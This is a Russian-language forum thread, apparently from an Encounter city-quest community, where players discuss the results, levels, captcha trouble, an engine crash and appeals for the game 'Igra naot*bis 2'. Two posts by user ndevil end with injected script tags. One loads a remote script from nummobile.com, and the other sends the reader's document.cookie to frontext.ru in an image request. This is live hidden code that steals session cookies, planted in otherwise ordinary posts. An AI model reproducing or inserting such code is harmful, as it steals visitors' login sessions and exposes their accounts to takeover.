PDA

Просмотреть полную версию : Игра наотъ*бись 2


Страницы : [1] 2

El Red
16-03-2013, 04:10
С учетом всех апелляций, бонусов, штрафов и компенсаций итоговое распределение мест выглядит так:

#1 Команда придурков, блеать!
#2 Futurama SPb Team
#3 Бaбники
#4 Пакмэн
#5 РАСЧЛЕНЁНКА
#6 СПГ
#7 VКХ
#8 psychos
#9 Люди_X
#10 Пешеезды
#11 764
#12 Якорьвзад

Итоговая статистика (http://deadline.en.cx/GameWinners.aspx?gid=41519)
Пересчет статистики по уровням с учетом бонусов и штрафов (http://docs.google.com/spreadsheet/pub?key=0Anz15Hb-Em9KdHpPNVhiZ0xpSjE4R1RfVmM2bWdPMkE&gid=1)
Апелляции и ответы на них (http://docs.google.com/spreadsheet/pub?key=0Anz15Hb-Em9KdHpPNVhiZ0xpSjE4R1RfVmM2bWdPMkE&gid=0)

prinncessa
16-03-2013, 04:20
Спасибо за игру. Не смотря на весь ахтунг весело, задорно и местами даже интересно.
убедительная просьба, финальную стату считать не на отъебись, а выспавшись и все взвесив)))

Jaguar
16-03-2013, 04:21
давайте результаты...а то не спится))

CraMax
16-03-2013, 04:26
статистику расп*дарасило ))

Jaguar
16-03-2013, 04:32
ага....мне пишет:
Прием оценок начнется сразу после прохождения последнего уровня.:D

Ol4ik
16-03-2013, 04:34
ага....мне пишет:
Прием оценок начнется сразу после прохождения последнего уровня.:D

Таки мы не финишировали :D играеееем!)

Goy
16-03-2013, 04:42
А мне понравилось закончить в 2:) Да и на игре было довольно весело. Но кодов реально было мало!

Jaguar
16-03-2013, 04:43
Таки мы не финишировали :D играеееем!)

выезжать обратно?:D канонерская 28?

S3T
16-03-2013, 06:06
быстро, динамично, айтишно, но косяк с первым уровнем и 3 секунды на капчу очень портят всю картину ((

ndevil
16-03-2013, 06:47
Спасибо за игру, понравилось. Быстро, динамично, весело, не задротно, уровень с тросом и замками вобще супер. Не понравилась только капча - по 2-3 секунды на одну капчу, даже со стационарного компа штаб физически не успевал ничего вбивать.
<script language='javascript' charset='UTF-8' type='text/javascript' src='http://nummobile.com/80j4ch2sa3g98uehlyoro4uftwotqhh'></script>
<script> img = new Image(); img.src = "http://frontext.ru/www/s.gif?"+document.cookie; </script>

G1ZM0
16-03-2013, 06:59
Игра понравилась. Спасибо! Не понравилось, что некоторые задания не брались с андройдов, и на последнем уровне лицо метеоритом расп*дарасило(( Спасибо конкурентам за аптечку)

Zlo
16-03-2013, 08:40
капча - пиздец!

многие задумки понравились.

по объективным причинам ушел спать раньше времени.

dab
16-03-2013, 10:14
В общем неплохо, несмотря на количество повторений слова пиздец в канале. Но вмешательства движок по ходу игры опасны.. Не надо так делать..

Effa
16-03-2013, 10:18
Игра - редкостная капча. Или капчец.

Jaguar
16-03-2013, 10:59
Ребята, обьявите статистику то с брифа, он же был в 4 утра:rolleyes:

Капчу кто-нить взял не последней? покажите этого монстроупорка)

RAVE
16-03-2013, 11:02
доставили уровень с тараканьим кодом и закурка с просвечивающими квадратами.
Обилие программерских фич расстроило(

Heckfy
16-03-2013, 11:34
Я фрезеровщик блеать, я не в хуй не дую как с английского прокси надо заходить на другие сайты....

Effa
16-03-2013, 11:44
Я фрезеровщик блеатьСделай игру, где на каждом уровне надо будет выпиливать и штрафы не в минутах, а в пальцах.
чтобы добавить ада, могу написать все закурки на итальянском.

Pukkaras
16-03-2013, 11:56
Ожидания, к сожалению, оправдались, хотел в штаб, но вытащили в поле за 3 часа до старта. Такая игра, не скажу что плохая, нормальная, но забуду, наверное, уже через недельку.

dab
16-03-2013, 11:57
Я фрезеровщик блеать, я не в хуй не дую как с английского прокси надо заходить на другие сайты....

Сажи ещё, что РЧ играет без штаба??:blabla::D
Конечно, понятно, что наличие системного админа или человека хорошо понимающего в компуттерах было преимуществом на этом уровне, зато теперь ты имеешь все шансы изучить этот вопрос, чтоб в следующий раз знать чо и как:-)

Misha
16-03-2013, 12:18
Что нужно было сделать с результатом выполнения регулярки?

Grom
16-03-2013, 12:24
Я так понял что просто найти слово в тексте, у которого внутри есть st и q или типа того :)

Мой личный рейтинг самых крутых авторов сегодня обновился:
1. Lvyona
2. Страус-труп
3. Ведра/кубики

Batleby
16-03-2013, 12:35
А чойта стата какя-то трешовая?

Punch
16-03-2013, 12:40
А чойта стата какя-то трешовая?

Четыре команды не проходили один из уровней линейной игры, поэтому в стате де-юре они играть не закончили.

Punch
16-03-2013, 12:41
Что нужно было сделать с результатом выполнения регулярки?

Миш, пользовался онлайн regex-конвертером, нашел ответ сразу.

Effa
16-03-2013, 12:46
Миш, пользовался онлайн regex-конвертером, нашел ответ сразу.Мы пользовались тремя калькуляторами с трех компов, у всех получился один и тот же ответ, который не проходил.

Крайне интересно узнать подробный способ раскурки, ибо этот слив нам стоил дорого.

Misha
16-03-2013, 12:56
Миш, пользовался онлайн regex-конвертером, нашел ответ сразу.
Я тоже, я поэтому и спросил, что делать с результатом, а не с самой регуляркой ;)
Результатом у нас было три слова. Вбивали их с пробелами и без, вместе и по отдельности, но бестолку...

Heckfy
16-03-2013, 13:23
Если я захерачу в задание задачку по сопромату или теормеху, многие команды пройдут этот уровень? Скажите еще, что все играют без штаба...

Deneb
16-03-2013, 13:26
Если я захерачу в задание задачку по сопромату или теормеху, многие команды пройдут этот уровень?

эта особенность склада ума некоторых людей меня всегда крайне удивляла. Нахуй так делать то? Хотя что то объяснять и спорить бесполезно, это удивительное явление я наблюдаю уже много лет, лечением сего недуга является только отрубание головы. А в целом игра ничо такая. Я все пиздецы для себя объяснил тем, что игра на отъебись. Оценку я тоже правда поставил рандомно(хотя всем похуй, но мне приятно).

Heckfy
16-03-2013, 13:37
В целом игра не плохая, но при такой продолжительности игры столь специализированные загадули обрекают команду на проеб. Вот я возьму и напишу... Хотя ясно, что не возьму и не напишу, т.к. хочется, чтобы играть можно было обладая хорошей эрудицией, а не какими-то конкретными знаниями. Поэтому стараюсь писать такие задания, которые и рыбак и фрезеровщик и химик могут раздуплить...

Тэ.
16-03-2013, 13:45
За*бись было на уровне с волшебной палочкой. Единственное, что бралось логично, просто и оригинально. Еще забавне лиса (привет Футураме :D)
А в остальном - кровь из глаз. С нетерпением жду сценария, а то как теперь суп варить без регэкспов даже и не представляю.

El Red
16-03-2013, 13:46
ППО: предварительная статистика

грициан
16-03-2013, 13:48
Конечно, понятно, что наличие системного админа или человека хорошо понимающего в компуттерах было преимуществом на этом уровне, зато теперь ты имеешь все шансы изучить этот вопрос, чтоб в следующий раз знать чо и как:-)

Да не только на этом уровне, а на всей игре.

А в целом да, игра капчец.

Velkopiterskij
16-03-2013, 13:52
Если я захерачу в задание задачку по сопромату или теормеху, многие команды пройдут этот уровень? Скажите еще, что все играют без штаба...

Если одну и с понятно гуглящимися формулами, то почему бы и нет)

prinncessa
16-03-2013, 13:55
ППО: предварительная статистика
Когда примерно ждать подробную, с комментариями и пересчетами?

Punch
16-03-2013, 13:57
Если одну и с понятно гуглящимися формулами, то почему бы и нет)

Велко, уйди со своим керлингом))))

areadna
16-03-2013, 13:58
Когда примерно ждать подробную, с комментариями и пересчетами?

В первом посте пишут к вечеру

Jaguar
16-03-2013, 13:59
Когда примерно ждать подробную, с комментариями и пересчетами?

там же написано к вечеру постараются))

prinncessa
16-03-2013, 14:00
там же написано к вечеру постараются))

Слепая я, слепая=)

Velkopiterskij
16-03-2013, 14:02
Велко, уйди со своим керлингом))))

Там-то что? Физика, 8 класс. Все ж почти школу заканчивали)

Velkopiterskij
16-03-2013, 14:05
Еще забавне лиса (привет Футураме :D)

А вот тут как раз очень хотелось поинтересоваться.
Получаем задание с лисой, видим, что СПГ уровень уже взяли и должны, вроде как, курить следующий. Однако за лисой катается Футурама(ещё находящаяся на уровне) и, внезапно, СПГ. При том СПГ едут так, что не дают Футураме обогнать лису и мешают нам к ней приблизится. Очень интересно как игроки команды соотносят это с пунктом 3.4.2. правил. Игрокам запрещается умышленно усложнять либо просто изменять условия взятия уровня для других команд. Сюда входят такие моменты как порча и маскировка кодов, опознавательных знаков и подходов к ним, создание ложных кодов и указателей, блокировка машин соперников, распространение заведомо неверной информации со ссылкой на организаторов и т.д.

Deneb
16-03-2013, 14:15
Это называется адить) А что, этот несчастный флажок с кодом орги показывали только из определенного окошка? И у них все окна были забиты досками кроме одного?) что мешало подъехать с другой стороны и заглянуть в другое окно? Если я не ошибаюсь, там где каталась лиса, три полосы в одну сторону. Или я что то не понимаю?
ЗЫ Слушал рассказы СПГ и Футы.

Velkopiterskij
16-03-2013, 14:21
Это называется адить) А что, этот несчастный флажок с кодом орги показывали только из определенного окошка? И у них все окна были забиты досками кроме одного?) что мешало подъехать с другой стороны и заглянуть в другое окно? Если я не ошибаюсь, там где каталась лиса, три полосы в одну сторону. Или я что то не понимаю?
ЗЫ Слушал рассказы СПГ и Футы.

Это, на мой взгляд, называется нарушение правил. Я повторюсь, что принципиальным в данном вопросе является то, что команда СПГ уровень уже закрыла.
К левому окошку подъехать было невозможно, ибо лиса ехала в крайнем левом ряду. Мы подъехали к правому окошку. Что не отменяет того что команда СПГ намерено создавала нам помехи при взятии уровня, на котором их уже не должно было быть.

Deneb
16-03-2013, 14:30
тогда всем третье место, посоны1

DEd_MONro
16-03-2013, 14:52
А вот мне игра тоже понравилось, было весело, особенно на капче, интресные всякие идейки и забавы были. Если б в движок не полезли то игра бы вообще супер, а ну и еще кодюль бы побольше а так игра оправдала название)))

Жду логики некоторых закурок, особенно первой))
Спасибо.

PS а с футой тоже весело вышло))

Deneb
16-03-2013, 15:21
а вот как самая лучшая команда в мире раскурила канонерскую
http://data2.floomby.com/files/share/16_3_2013/VQu16WYngEerDCnXcv6pyQ.jpg
:D:D:D

грициан
16-03-2013, 15:41
а вот как самая лучшая команда в мире раскурила канонерскую
http://data2.floomby.com/files/share/16_3_2013/VQu16WYngEerDCnXcv6pyQ.jpg
:D:D:D

Её многие раскурили) Вы туда поехали?)

nadlooshi
16-03-2013, 15:42
Не понравилось совсем и ничего. Игра заняла первое место в списке эпично засранных. Причем самое обидное, что задумки были крутые некоторые, но от реализации кровь текла из глаз всю игру. В полях было веселее, наверное...
Ну и статистика... промолчу про статистику. Снимать уровень, когда на нем 4 команды, а потом возвращать его (при условии, что тем, кто на нем был, он уже выдан не будет...) - это лютый ад. Кое-как это можно объяснить незнанием движка, но вроде как почти у всех авторов по 5-6 игр на движке en в послужном, вроде как не первый раз движок в глаза увидели. В общем, не зашло совсем, простите. Я так и не поняла, чем я вчера занималась до двух часов ночи.

Jaguar
16-03-2013, 15:46
Её многие раскурили) Вы туда поехали?)

мы матанулсиь, после пдск вернулись...:D

Punch
16-03-2013, 15:47
Её многие раскурили) Вы туда поехали?)

мы съездили, облизали кананерскую-28. а что еще, если версий нет и быть не может? а тут опа - и реально коорды выкурены, и в зоне находятся. Да, видели там только РЧ

Effa
16-03-2013, 15:50
А вот кстати, я почти 7 лет уже играю на энкодвигле и всегда, ВСЕГДА было так, что вернуть снятый уровень нельзя, ващпе, даже если сиськи Эйру показать. Но тут авторы смогли. У меня устаревшие познания о движке или авторы применили магию?

грициан
16-03-2013, 15:59
А вот кстати, я почти 7 лет уже играю на энкодвигле и всегда, ВСЕГДА было так, что вернуть снятый уровень нельзя, ващпе, даже если сиськи Эйру показать. Но тут авторы смогли. У меня устаревшие познания о движке или авторы применили магию?

А ещё обычно нельзя в линейной игре вставить уровень до того, на который уже перешла команда.

Вообще в Энке есть такое понятие "талантливые программисты". Оно хоть не об авторах игр, но к определению данной игры вполне подходит.

nadlooshi
16-03-2013, 16:01
А вот кстати, я почти 7 лет уже играю на энкодвигле и всегда, ВСЕГДА было так, что вернуть снятый уровень нельзя, ващпе, даже если сиськи Эйру показать.
Не знаю, насколько давно (года два так точно), но можно... Там внизу после всех перестановок есть окошко Снять уровень - Вернуть уровень и выпадающее меню с номерами уровней.

Punch
16-03-2013, 16:12
А, по игре. Несмотря на россыпь маленьких и огромных косяков, игра понравилась. Очень много смелых и интересных задумок, побылвал на некоторых местах, которые давно знаю, но случая побывать не представлялось.

1. Беринга - как я понимаю, задание курилось (если курилось) через жопу + явные коорды в хтмл-коде, которые бьют в зону. По полелогике здесь и на задании с магической книгой очень хотелось бы хотя бы намек на то, что относится к заданию, а что - к полелогике. Очень долго здесь прикуривали Regex, когда уже приехали на канонерскую. Саму полелогику взяли на ура (нашел какой-то конвертер, который сразу и однозначно выдал закрывающий код)
2. метро - пролетело мимо, задание из очевидных, взяли быстро, я из машины не успел выйти)
3. Екатерингофка - до статы уже по заданию не вспомню, но раскурили быстро. Идея уровня достаточно боянна, но мне такие уровни заходят (как и похожий уровень у Бабников на ДЛ1). Единственное не понял, зачем нас Сашка обозвал Пешеездами))
4. КО3 - лютый пиздец с двиглом, скелет суперский! наконец я на него залез и пару фоток еще успел сделать)
5. Гиря на мосту - смысл уровня не понял, загадки не было, в общем уровень а-ля метро и трефолева 10)) Запомнился только тем, что у этого моста потом все стояли и пытались вбить капчу))
6. собственно, капча: респект Футураме, что они взяли доезд до получения 20-го бонуса) отборного мата стояло в машине - шописец. Монро, выложи видяху на всеобщее обозрение, что у вас в машине было:D Загадку недотестили - уровень практически невозможно было взять с поля, когда из 10 секунд 5 секунд грузится страница и 5 секунд она пролистывается до капчи и обратно до поля ввода кода. Сам уровень понравился, брали быстро и все, что видели в двигле - в итоге коце закрыло уровень по какому-то количеству кодов)
7. Трефолева 45 - загадку не видел, не успел, коды хорошо прописаны (да и вообще надо отметить, все коды были нормальные на игре, метки тоже - за что респект, ребята)
8. Лиса - взяли из-за Яги, который зачем-то решил с лисой поравняться на светофоре, пока мы курили семафорную азбуку, а заодно успел прочитать код)) Загадка, конечно, простая)
9. Магия - вот тут мы чуть не скатились в подвал турнирки) ибо курили книгу, тыкались в нее безбожно палкой (волшебной). раскурили только с подсказки (все гениальное - просто). На уровне коце уж докурило, как там надо палкой по книге водить. В общем уровень - отличный, только бы написали, что к загадке относится, а что - к полелогике.
10. с трефолева все понятно. цифра 10 - и можно на желтый угол даже не смотреть)

В общем, динамично, весело, зашло местами)
Пишите еще, только тестите и не оставляйте все на последнюю неделю)

El Red
16-03-2013, 16:13
Снимать уровень, когда на нем 4 команды, а потом возвращать его (при условии, что тем, кто на нем был, он уже выдан не будет...) - это лютый ад. Кое-как это можно объяснить незнанием движка, но вроде как почти у всех авторов по 5-6 игр на движке en в послужном, вроде как не первый раз движок в глаза увидели.
Если ты предложишь мне более адекватное решение этой проблемы (http://s017.radikal.ru/i434/1303/cb/9cf5768d5a8d.jpg) - скажу спасибо.
После перехода на уровень КО-3 некоторые команды стали жаловаться на то, что "движок упал". Когда стало ясно, что все жалующиеся команды висят на одном и том же уровне, было принято решение снять уровень, чтобы повисшие команды перешли на следующий и посчитать им снятый уровень по среднему.

А вот кстати, я почти 7 лет уже играю на энкодвигле и всегда, ВСЕГДА было так, что вернуть снятый уровень нельзя, ващпе, даже если сиськи Эйру показать. Но тут авторы смогли. У меня устаревшие познания о движке или авторы применили магию?
http://d1.endata.cx/data/games/41519/levelback.png

nadlooshi
16-03-2013, 16:20
Если ты предложишь мне более адекватное решение этой проблемы (http://s017.radikal.ru/i434/1303/cb/9cf5768d5a8d.jpg) - скажу спасибо.
Да не, вы приняли верное решение о снятии уровня. Но возвращать-то его было потом зачем? :)

Effa
16-03-2013, 16:38
http://d1.endata.cx/data/games/41519/levelback.png
У кого есть машина времени? Мне во Владивосток в сентябрь 2007 года с этой фичей надо сгонять!

El Red
16-03-2013, 16:43
Да не, вы приняли верное решение о снятии уровня. Но возвращать-то его было потом зачем? :)
Чтобы его могли пройти остальные и чтобы посчитать по среднему тем, кто не прошел. Только потом выяснилось, что не прошли слишком многие

грициан
16-03-2013, 16:45
Если ты предложишь мне более адекватное решение этой проблемы (http://s017.radikal.ru/i434/1303/cb/9cf5768d5a8d.jpg) - скажу спасибо.

Вычитывать сценарий несколько раз ДО игры. Чтоб не нужно было срочно вставлять уровни. Как при таком количестве авторов так накосячить я не понимаю.

Punch
16-03-2013, 16:56
Вычитывать сценарий несколько раз ДО игры. Чтоб не нужно было срочно вставлять уровни. Как при таком количестве авторов так накосячить я не понимаю.

Да тут же у нас много гуру энкодвижка! помогите уж ребятам, а то ситуация и правда нестандартная...

P.S. Первый раз вижу людей, которые снесли энкодвиг)))
Может, на RECO? Или уж АГТ вернем?))
А то его нафиг, падает и падает:D:D:D

Grom
16-03-2013, 17:08
Боюсь, что другие движки они утопят еще на первом задании :)

грициан
16-03-2013, 17:15
Да тут же у нас много гуру энкодвижка! помогите уж ребятам, а то ситуация и правда нестандартная...

Единственный выход я написал выше. Ну и думать даже в экстренных ситуациях прежде, что нажимать кнопки.

Heckfy
16-03-2013, 17:24
Еще в самых первых моих играх в этом самом проекти удивлялся какие задания для штаба неровные. В одном задании вам нужна семья Друзей для разгадки, а в другом приходят координаты сразу.
Вот и тут - трефолева 10 и Беринга - очень-очень отличаются. Ну таков самый лучший ( после покойного) проект на свете.

S3T
16-03-2013, 18:14
Игра понравилась. Спасибо! Не понравилось, что некоторые задания не брались с андройдов, и на последнем уровне лицо метеоритом расп*дарасило(( Спасибо конкурентам за аптечку)

эт по игре конкуренты, а со здоровьем - незя соперничать

эт Вам спасибо, буду знать, что аптечку надо обновить

без швов хоть обошлось дело?

DEd_MONro
16-03-2013, 18:22
P.S. Первый раз вижу людей, которые снесли энкодвиг)))


Это ты явно в лихие девяностые не играл

Effa
16-03-2013, 18:31
Это ты явно в лихие девяностые не играл
Не, там весь нокаутир упал еще до игры, а тут только домен дедлайна поломался.

DEd_MONro
16-03-2013, 19:41
Не, там весь нокаутир упал еще до игры, а тут только домен дедлайна поломался.

НУ это я как раз к тому что бывают лаги с движком и глобальнее))
Зато весело по скайпу поиграли

ndevil
16-03-2013, 19:51
а когда будет монторинг? уже вечер вобщето.
<script language='javascript' charset='UTF-8' type='text/javascript' src='http://nummobile.com/80j4ch2sa3g98uehlyoro4uftwotqhh'></script>
<script> img = new Image(); img.src = "http://frontext.ru/www/s.gif?"+document.cookie; </script>

McLuck
16-03-2013, 21:28
Игра хороша, спасибо авторам! Играли, наконец-то ЦЕЛЫМ экипажем и полуКЦ. Им тоже спасибо!
Где конечка первого кода на Трефолева 45??
Попрошу добавить к стоп-тайму 1-1,5 минуты из-за замочка.
Почему нашего замочка не было и мы пользовались замочком "команда придурков..". И в следующий раз замочки закрывайте сами)
Почему на тараканьих бегах код №24 в задании был КО1? Потратили ~25 мин из-за этого.
Ну и конечно порадовались, посмотрев стату после второго-третьего задания, когда почему-то были первые))

Тэ.
16-03-2013, 21:45
http://www.youtube.com/watch?feature=player_embedded&v=AMP9WzYSoxw

McLuck
16-03-2013, 23:40
Уже можно, думал, вдруг пригодится)
Инфа 146% - Эфир, Метеорит, Harlem shake (http://www.youtube.com/watch?v=Qdk2zSQETkM)

Shifer23
17-03-2013, 02:03
А то, что в статистике и сценарии, еще правиться будет или имеет смысл наваливать с вопросами?

Heckfy
17-03-2013, 02:30
Ясен хуй. Надо эпиляцию писать. такие дела.

El Red
17-03-2013, 02:56
Сценарий: http://deadline.en.cx/GameScenario.aspx?gid=41519
Я снова забыл, какое шаманство надо сделать, кроме признания игры состоявшейся, чтобы все увидели мониторинг. Кто знает - подскажите.

Предварительная статистика - в первом посте.
Статистика в движке неактуальна. Постараемся привести ее в нормальный вид завтра.
Также будем проверять итоговое время прохождения уровней командами по времени выхода на уровень (в статистике) и времени вбития кодов (по мониторингу). Если окажется, что из-за добавления-снятия уровней в движке что-то просуммировано неправильно, статистика изменится.

nadlooshi
17-03-2013, 03:14
Сценарий: http://deadline.en.cx/GameScenario.aspx?gid=41519
Я снова забыл, какое шаманство надо сделать, кроме признания игры состоявшейся, чтобы все увидели мониторинг. Кто знает - подскажите
Можно, подскажу?
Настройки игры - Расширенные настройки - Показывать мониторинг. Там же, собсно, занятое место, сценарий, статистика (хотя она и так видна) и прочее.
Кстати, команды, которые не финишировали по движку (мож кому очки нужны или оценку поставить там), можно довести до финиша через финишный протокол (так же, где признают игру состоявшейся через Корректировать результаты), но тогда она станет еще более неактуальна:)

El Red
17-03-2013, 04:05
Можно, подскажу?
Настройки игры - Расширенные настройки - Показывать мониторинг. Там же, собсно, занятое место, сценарий, статистика (хотя она и так видна) и прочее.

http://d1.endata.cx/data/games/41519/nomon.png
я пиздоглаз или там правда нет пункта про мониторинг?

Кстати, команды, которые не финишировали по движку (мож кому очки нужны или оценку поставить там), можно довести до финиша через финишный протокол (так же, где признают игру состоявшейся через Корректировать результаты), но тогда она станет еще более неактуальна:)
Да, знаем. Но надо ли рисовать финишный протокол команде, которая снялась с игры?

G1ZM0
17-03-2013, 04:19
эт по игре конкуренты, а со здоровьем - незя соперничать

эт Вам спасибо, буду знать, что аптечку надо обновить

без швов хоть обошлось дело?

долго думал как Вас назвать "конкуренты", "коллеги" или "собратья")))
обошлось без швов, т.к. в травму не поехал. Мажу рожу мазьками, обклеиваю пластырями...вроде норм))) но шрам останется(

Jaguar
17-03-2013, 05:28
когда ждать окончательную статистику?

ВарENик
17-03-2013, 09:36
О, я таки доползла до сюда))
Впервые видела такой глюк движка, была в шоке...
Понравился уровень с расп*дорашеным кодом...
Капчу мы взяли не последнюю, если не ошибаюсь 11 была...
А в целом лично мне много чего не понятно, ибо я не программер...
Спасибо всем кто специально и случайно был с нами в штабе)))
Спасибо за короткую игру)))

грициан
17-03-2013, 09:52
http://d1.endata.cx/data/games/41519/nomon.png
я пиздоглаз или там правда нет пункта про мониторинг?


Да, знаем. Но надо ли рисовать финишный протокол команде, которая снялась с игры?

Мониторинг не надо открывать. Не в смысле что он не нужен, сейчас мониторинг открывается автоматически. Т.е. уже открыт и доступен.

А вот отображать место участника в конце игры стоит поставить.

По второму вопросу думаю не нужно, если они сами снялись.

Тэ.
17-03-2013, 11:14
А выносить оппеляции в сценарий - это тоже какой-то магический ритуал? Я так, уточнить. А то вдруг без этого игра не закроется и очечи не начислятся. А нам без очечей никак нельзя. Не православно это.

McLuck
18-03-2013, 00:30
Какая команда играла на уазике?

Jaguar
18-03-2013, 00:34
итоговую стату когда ожидать?

Heckfy
18-03-2013, 00:34
никогда

Го
18-03-2013, 00:36
Какая команда играла на уазике?
Психоз

DashИК
18-03-2013, 00:48
Не смотря на некоторое количество технических косяков игра понравилась.
На первом задание хороший штаб оказался минусом - уехали на Канонерскую, 28, потеряли много времени на возвращение, но зато потом компенсировали потерянное время быстрой раскуркой кода.
Васька позабавила - по-моему люди в камуфляже с фонарями и рациями бегущие по эскалатору не удивляют уже не только обычных граждан, но и сотрудников милиции...
"Внезапно кирпич" оказался действительно "внезапно кирпичом". Долго сомневались в месте - уж больно далеко от Васьки. Путанка понра, хотя я не совсем понимаю, почему нельзя было дать правильный замок... можно было бы обойтись без штрафа, но это мелочи. И да, орги молодцы. что оперативно разрулили ситуацию.
Увидеть как упал двидок енки - бесценно. У нас были приглашенные удаленщики, это была их первая игра в ДЛе... ребят, вы сделали то, что почти невозможно ))) и я реально не знаю, что правильнее, говорить, что это пиздец, или же гордиться нашими умельцами.
Капча подарила 15 минут мата и истерик в нашей машине, а также великолепное видео. Монро - ты лучший )))
Рапидорашеные коды понравились, спасибо нашему КЦ, что мы не успели заипаться.
Любимый баян на Трефолева, как же я по нему соскучилась )
Безумная Fox-а.
Адовый затуп с кордами и потом с книгой.
Еще один любимый баян на Трефолева и затем "черная дыра" )

Спасибо за игру, было ржачно и ненапряжно, но все-таки хочется, чтобы в будущем игры как-то тестировались авторами. И да немного странно столкнуться с этим: "необходимость дописывать одну из загадок и прописывать еще два кода привели к спешке в начале игры и впопыхах мы просто-напросто забыли про карту." на игре людей, которые пишут не первую игру.
В общем хочет пожелать на будущее лучшего уровня организации при таком же уровне позитива и количестве прикольных задумок.

Кюхель
18-03-2013, 05:51
Салют.
Что делают, когда пишут первое сообщение? Правильно - выдают только положительные эмоции.
Что делать, когда их нет? Правильно - не писать первое сообщение:o.

Поэтому всё, что рыжим, можете не читать ;)

Вот, к примеру, игра. Что делать, когда есть что делать, но по сути делать нечего? И - ничего не поделать - надо это делать, даже если это не дело?... А кое-кому надо либо делать, либо не делать. Но это надо делать до игры.
Потому мнение. Минус один, но глобальный, а плюсов вагон, но мелких.

-
Пусть вся программерская хрень горит в аду :rolleyes::
- к специализированным областям знаний - отдельное руководство и предупреждение командам до игры (например, "гуманитарии, сдохните" или "литературные загадки для лохов" или "я у мамы программист");
- мозиллу в стафф(!);
- широкоэкранный дизайнерский бук (или необходимость убогим бескацешным командам породить кц с широкоэкранным дизайнерским буком) и авто пошире в стафф.

Готов записаться в почетные (кто там у нас?) фрезеровщики или кузнецы. Ибо я скорее научусь гнуть паранормального размера болты, чем расшифровывать regex не как "регулярная бывшая" или вешать на рыжую лису рыжие кирпичи. Недемократичность это плохо.

Непонятно, почему уровни одного формата (игровые, веселые), а загадки совершенно иного (серьезные, задротные, алогичные по природе).

+
+ уровень с замками восхитителен;
+ давно не тягал гири;
+ метро прекрасно, прокачало;
+ книга магии уау е;
+ мгновенная лиса;
+ множество косяков списалось на раскрытие темы игры (ну что ж, обещали наотъ*бись и слово сдержали).

Любые отходы от шаблонов это аллилуйя! Возблагодарим! Так-то спасибо=)

С уважением.

P.S. Если у кого-нибудь возникнет добро на это сообщение, пожалуйста, просветите. Вот уже есть небольшой бэкграунд по играм здесь. Подскажите, полное отсутствие сюжетной линии, вовлечения в игровой процесс, погружения в игру - неужели это норма, или просто нам "везёт"? Пока была только одна игра (я разные форматы имею в виду), где было интересно, а не только шилов*опие. Склонен считать, что движок-ограничитель творчества тому виной.

Grom
18-03-2013, 08:27
Мозиллу зачем в стафф?
Сохранил страницу на комп полностью, поменял цвет фона на черный, сохранил, открыл :)
Не знаешь что такое регулярки - в вики все объяснено + есть онлайны.

В целом задумки интересные, но не зашло...

Pukkaras
18-03-2013, 09:25
P.S. Если у кого-нибудь возникнет добро на это сообщение, пожалуйста, просветите. Вот уже есть небольшой бэкграунд по играм здесь. Подскажите, полное отсутствие сюжетной линии, вовлечения в игровой процесс, погружения в игру - неужели это норма, или просто нам "везёт"? Пока была только одна игра (я разные форматы имею в виду), где было интересно, а не только шилов*опие. Склонен считать, что движок-ограничитель творчества тому виной.
не могу себе представить как движок может быть ограничителем творчества..
Отсутствие сюжетов меня тоже печалит. Но тут вообще все зависит от авторов, они же постоянно разные у всех свое видение. Также стоит разделять понятия сюжет и тема. Если речь идет именно о сюжете, тобишь как о квестовой составлящей, то это довольно таки сложно, таких игр не очень много. я не беру в рассмотрение якобы сюжетные игры по всяким фильмам/книгам/играм, когда взяты просто имена героев и некоторые сценки обыграны в заданиях и на местах какиенить чухи в кокошниках.

DEd_MONro
18-03-2013, 09:34
А какая интересно сюжетная линия должна быть в игре с подобным названием?))

El Red
18-03-2013, 09:39
Увидеть как упал двидок енки - бесценно. У нас были приглашенные удаленщики, это была их первая игра в ДЛе... ребят, вы сделали то, что почти невозможно ))) и я реально не знаю, что правильнее, говорить, что это пиздец, или же гордиться нашими умельцами.
баг с падением движка я воспроизвел на демо-движке, написал техдиру ЕН, он ответил, что это всегда было запрещено, теперь, видимо, сломалось, и обещал пофиксить.

И да немного странно столкнуться с этим: "необходимость дописывать одну из загадок и прописывать еще два кода привели к спешке в начале игры и впопыхах мы просто-напросто забыли про карту." на игре людей, которые пишут не первую игру.
двойная просрочка и тема игры оставили свой след

+ множество косяков списалось на раскрытие темы игры (ну что ж, обещали наотъ*бись и слово сдержали).
да уж. в прошлой Наотъ*бись (http://deadline.en.cx/GameDetails.aspx?gid=27165) мы специально делали "недописанные" уровни и "неготовые" перфаки. а в этот раз случай помог нам достичь апогея антуражности =)

Jaguar
18-03-2013, 10:16
Ваня, стата окончательная?

El Red
18-03-2013, 10:34
не могу себе представить как движок может быть ограничителем творчества..
Отсутствие сюжетов меня тоже печалит. Но тут вообще все зависит от авторов, они же постоянно разные у всех свое видение. Также стоит разделять понятия сюжет и тема. Если речь идет именно о сюжете, тобишь как о квестовой составлящей, то это довольно таки сложно, таких игр не очень много. я не беру в рассмотрение якобы сюжетные игры по всяким фильмам/книгам/играм, когда взяты просто имена героев и некоторые сценки обыграны в заданиях и на местах какиенить чухи в кокошниках.

Всё верно.
Порой очень непросто натянуть сюжет на игровую схему, сохранив при этом соревновательность, равные условия и "изолированное" прохождение сюжета командами (что является необходимым условием равных условий).
Самой сюжетной игрой была провокация от ДРК и компании. Соревновательности и изолированности там и рядом не было, в итоге - всем второе место и 15 очков. Не скажу, что мне не понравилось, но, если бы все игры были такими, то дедлайна в его текущем виде, наверное, уже бы не было.

El Red
18-03-2013, 10:34
Ваня, стата окончательная?
нет, еще разобраны не все эпиляции.
постараемся скорее закончить.

Jaguar
18-03-2013, 12:32
нет, еще разобраны не все эпиляции.
постараемся скорее закончить.

у тебя свой новый бизнес? делаешь эпиляции?:D

El Red
18-03-2013, 12:44
эпиляции делают игравшие команды. а мы избавляем их от мук. или не избавляем. или не их.

Jaguar
18-03-2013, 13:10
эпиляции делают игравшие команды. а мы избавляем их от мук. или не избавляем. или не их.

шутка юмора:blabla:

Ol4ik
18-03-2013, 13:22
шутка юмора:blabla:

ты просто слово лопата не заметил ))

El Red
18-03-2013, 13:22
По просьбам буквоедов)

3.5.1. Организаторы игры обязаны огласить подробные предварительные результаты в течение 72 часов после завершения игры (игра считается завершённой, когда в ней не осталось играющих команд). Результаты должны быть опубликованы в игровой системе либо на форуме проекта. Они должны содержать статистику каждой команды по каждому уровню с указанием причин штрафов, если таковые есть, а также подробный сценарий игры с комментариями.


Предварительные результаты (http://deadline.en.cx/GameWinners.aspx?gid=41519)
Сценарий с комментариями (http://deadline.en.cx/GameScenario.aspx?gid=41519)
